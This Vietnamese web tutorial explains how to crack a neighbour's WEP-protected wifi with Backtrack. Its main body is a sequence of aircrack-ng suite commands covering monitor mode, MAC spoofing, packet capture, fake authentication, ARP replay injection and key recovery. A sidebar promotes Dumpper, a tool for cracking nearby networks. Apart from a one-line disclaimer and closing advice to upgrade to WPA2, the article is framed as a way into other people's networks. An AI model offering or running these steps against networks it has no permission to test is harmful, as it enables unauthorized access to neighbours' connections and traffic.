Dò tìm mật khẩu wifi hàng xóm với Backtrack

Mật khẩu wifi mã hóa dạng WEP hiện tại đã không còn được sử dụng do các vấn đề về an ninh và bảo mật. Tuy nhiên, đối với một số thiết bị cũ vẫn sử dụng chuẩn WEP, việc dò mật khẩu wifi “nhà hàng xóm” đã không còn quá phức tạp. Taimienphi sẽ hướng dẫn các bạn chi tiết cách dò mật khẩu wifi dạng WEP với Backtrack

WEP - Wired Equivalent Privacy - thuật toán bảo vệ wifi của các bộ định tuyến không dây đã được giới thiệu và sử dụng rất rộng rãi trong thời điểm trước đây. Tuy nhiên trong quá trình sử dụng, thuật toán WEP lộ ra nhiều lỗ hổng bảo mật và bị khai thác làm ảnh hưởng đến an ninh thông tin cho người dùng cũng như doanh nghiệp. Về sau này, các chuẩn mã hóa tiên tiến hơn đã được giới thiệu như WPA hay WPA2 thay thế WEP đã lỗi thời, tuy nhiên trên các thiết bị cũ hay những mạng máy tính đã lỗi thời, WEP vẫn còn tiếp tục được sử dụng.

do tim mat khau hang xom voi backtrack

Taimienphi sẽ hướng dẫn các bạn chi tiết các bước thao tác dò mật khẩu mạng wifi sử dụng chuẩn mã hóa WEP bằng Backtrack. Các bạn lưu ý, không sử dụng cách làm này vào mục đích phá hoại hay ý đồ xấu.

Yêu cầu hệ thống hạ tầng :

Bộ chuyển đổi không dây tương thích : Đây là yêu cầu lớn nhất cho hạ tầng, bạn cần chuẩn bị 1 bộ chuyển đổi không dây (wireless adapter) có khả năng truyền gói tin mà máy tính của bạn không làm được. Các bạn có thể tham khảo một số model như Alfa AWUS050NH…

Đĩa Backtrack LiveCD : Cho phép thực hiện các thao tác kiểm tra bảo mật. Bạn có thể tải các bản ISO và burn lại trên CD của mình.

Mạng wifi chuẩn WEP : Lưu ý, tin hiệu cần ổn định và có nhiều người dùng, càng nhiều người sử dụng cơ hội dò mật khẩu thành công càng cao

Thao tác dò mật khẩu wifi với Backtrack

Bước 1: Kích hoạt giao diện dòng lệnh Konsole trong Backtrack

Bước 2: Gõ vào dòng lệnh

airmon-ng

để lấy danh sách mạng

Các bạn ghi lại thông tin trong cột Interface , ở đây là ra0

Gõ lần lượt các dòng lệnh

airmon-ng stop (interface)

ifconfig (interface) down

macchanger --mac 00:11:22:33:44:55 (interface)

airmon-ng start (interface)

(interface) là tên mạng interface bên trên các bạn đã lưu lại, của mình là ra0

do tim mat khau hang xom voi backtrack

Bên trên là các bước giả mạo địa chỉ MAC mới cho Interface mạng. Trong quá trình các bạn thao tác nếu kết quả không giống như bên trên, có thể wireless adapter của bạn không phù hợp nữa.

Bước 3 : Gõ tiếp dòng lệnh

airodump-ng (interface)

(interface) là tên mạng interface bên trên các bạn đã lưu lại, của mình là ra0

do tim mat khau hang xom voi backtrack

Câu lệnh này sẽ cho hiển thị các mạng wifi xung quanh bạn. Khi tìm thấy wifi bạn muốn dò mật khẩu, bấm tổ hợp phím Ctrl + C để dừng danh sách.

Các bạn lưu lại các thông số BSSID CH . Lưu ý trong cột ENC hay CCMP phải là WEP bạn mới có thể dò mật khẩu được

Bước 4: Gõ vào dòng lệnh

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

(channel) là thông số CH bạn lưu ở bước 3

(bssid) là thông số BSSID bạn đã lưu ở bước 3

(interface) là tên mạng interface bên trên các bạn đã lưu lại, của mình là ra0

(filename) là tên file mô tả, các bạn có thể đặt tùy ý. Ở đây mình đặt là yoyo

do tim mat khau hang xom voi backtrack

Bước 5: Bạn sẽ nhận được đầu ra của câu lệnh như hình trên, để nguyên cửa sổ ở đó, mở cửa sổ câu lệnh Konsole mới, nhập lệnh

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

(bssid) là thông số BSSID bạn đã lưu ở bước 3

(essid) là tên file mô tả (filename) các bạn đặt ở bước 4

(interface) là tên mạng interface bên trên các bạn đã lưu lại, của mình là ra0

do tim mat khau hang xom voi backtrack

Bạn sẽ nhận được tin nhắn báo thành công Association successful J

Bước 6 : Gõ tiếp vào câu lệnh

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

(bssid) là thông số BSSID bạn đã lưu ở bước 3

(interface) là tên mạng interface bên trên các bạn đã lưu lại, của mình là ra0

00:11:22:33:44:55 là địa chỉ MAC giả mạo bên trên

Backtrack sẽ tiến hành bắt các gói tin từ dữ liệu ra vào trên mạng Wifi đó. Dữ liệu sẽ được thu thập đầy đủ để tiến hành dò mật khẩu.

Lưu ý: Theo dõi số liệu cột Data ở cửa sổ Konsole đầu tiên. Bạn cần phải để số liệu trong cột #Data vượt qua con số 10.000 , Backtrack mới có thể có đủ dữ liệu để dò mật khẩu

do tim mat khau hang xom voi backtrack

Bước 7: Mở cửa sổ Konsole mới và nhập câu lệnh

aircrack-ng -b (bssid) (file name-01.cap)

(bssid) là thông số BSSID bạn đã lưu ở bước 3

File name các bạn có thể đặt tùy ý với phần mở rộng là .cap

do tim mat khau hang xom voi backtrack

Sau bước này, nếu như mật khẩu được dò ra sẽ hiển thị ngay trên giao diện câu lệnh sau từ khóa KEY FOUND . Trường hợp không đủ dữ liệu để dò được mật khẩu, bạn nên thử lại vào thời điểm khác.

Lưu ý: Các bước làm trên đây được thực hiện trong điều kiện lý tưởng với tỉ lệ thành công cao. Trong quá trình các bạn thao tác, rất có thể các bước sẽ không giống như trên hoặc có thông báo lỗi, các bạn cần kiểm tra lại hạ tầng mạng cũng như thực hiện lại vào thời điểm khác. Điều cần thiết trong việc này luôn là sự kiên nhẫn chờ đợi do việc dò mật khẩu từ các gói tin ra vào là không hề đơn giản.

http://thuthuat.taimienphi.vn/do-tim-mat-khau-hang-xom-voi-backtrack-22644n.aspx
Trên đây là một số bước để dò mật khẩu wifi sử dụng chuẩn mã hóa WEP. Như các bạn đã thấy, vấn đề bảo mật wifi bằng chuẩn WEP đã rất lỗi thời và có thể bẻ khóa bằng một vài thao tác dòng lệnh đơn giản, các bạn nên rà soát lại hệ thống wifi mình đang sử dụng và nâng cấp lên các chuẩn mới để đảm bảo an toàn cho hệ thống của mình. Ngoài ra các bạn cũng có thể kết nối mạng wifi ẩn đối với các đường truyền không cần public để sử dụng.

Tác giả: Lê Thị Thuỷ     (4.0★- 14 đánh giá)  ĐG của bạn?

  

Bài viết liên quan

Ẩn Wifi, ẩn SSID Viettel, FPT, GPON, HUAWEI trên Laptop
Cách tìm mật khẩu wifi đơn giản
Cách lấy lại mật khẩu wifi, tìm password wifi đã lưu trên Laptop
Cách sử dụng mạng Wifi nhà bạn an toàn hơn
Cách đổi mật khẩu modem wifi Tplink
Từ khoá liên quan:

tim mat khau wifi

, tim mat khau wifi wep, do mat khau wifi,

SOFT LIÊN QUAN
 • Dumpper

  Phần mềm dò Wifi hàng xóm

  Dumpper có khả năng tìm kiếm nhanh chóng các mật khẩu wifi xung quanh bạn để kết nối miễn phí vào mạng wifi có sóng mạnh nhất. Phần mềm Dumpper làm việc với nhiều loại modem khác nhau nhưng hoạt động tốt trên các dòng modem của TP-Link, Tenda, ZyXEL...Bên cạnh đó Dumpper còn có khả năng bẻ khóa” WiFi được bảo mật bằng mã khóa, ưu tiên Modem WiFi phổ biến cũng như driver mạng tương thích với máy tính đang sử dụng.

Tin Mới

 • Wifi 6 là gì? Lợi ích

  Wifi 6 là chuẩn không dây thế hệ tiếp theo, tốc độ nhanh hơn 802.11ac rất nhiều. Ngoài tốc độ, Wifi 6 còn cung cấp hiệu suất tốt hơn đặc biệt là trong các khu vực đông người dùng như sân bay, ... . Để tìm hiểu Wifi 6 là gì? Lợi ích ra sao, bạn đọc cùng tham khảo bài viết dưới đây của Taimienphi.vn.

 • Cách sử dụng Netcut

  Bạn đang tìm một phần mềm giúp quản lý mạng Internet của bạn? Tín hiệu mạng chậm chạp vì thường xuyên có người dùng trộm mạng Wifi nhà bạn? Sử dụng Netcutsẽ là một lựa chọn tuyệt vời cho bạn.

 • Cách đổi mật khẩu wifi TL-WA801ND

  Sản phẩm TL-TL-WA801ND khá thông dụng với người dùng Việt Nam. Với mức giá rẻ, lại có 2 ăng-ten phát sóng wifi xa thì TL-TL-WA801ND là lựa chọn hàng đầu, việc đổi mật khẩu wifi TL-TL-WA801ND cũng cực dễ dàng khi modem này sử dụng giao diện TP Link cũ.

 • Top Tên bé trai hay và đẹp, ý nghĩa

  Bài viết "Top Tên bé trai hay và đẹp, ý nghĩa" sẽ giúp bạn có thêm những ý tưởng để đặt tên cho em bé của mình. Việc đặt tên bé trai, bé gái đẹp luôn được những ông bố, bà mẹ suy nghĩ, dành thời gian để tìm hiểu để làm sao tên con trai của mình thật ý nghĩa, mang lại nhiều may mắn mà không trùng với tên của ông bà tổ tiên, người lớn tuổi trong gia đình. Với top Tên bé trai hay và đẹp, ý nghĩa sẽ giúp bạn dễ dàng chọn một cái tên để đặt cho con của mình.


 Mùa hè tới rồi muốn so sánh giá tìm điều hòa giá rẻ nhất thị trường hãy dùng TopGia để so sanh gia có nhiều mẫu dieu hoa để so sanh sanh, xem dieu hoagiá rẻ để so sánh giá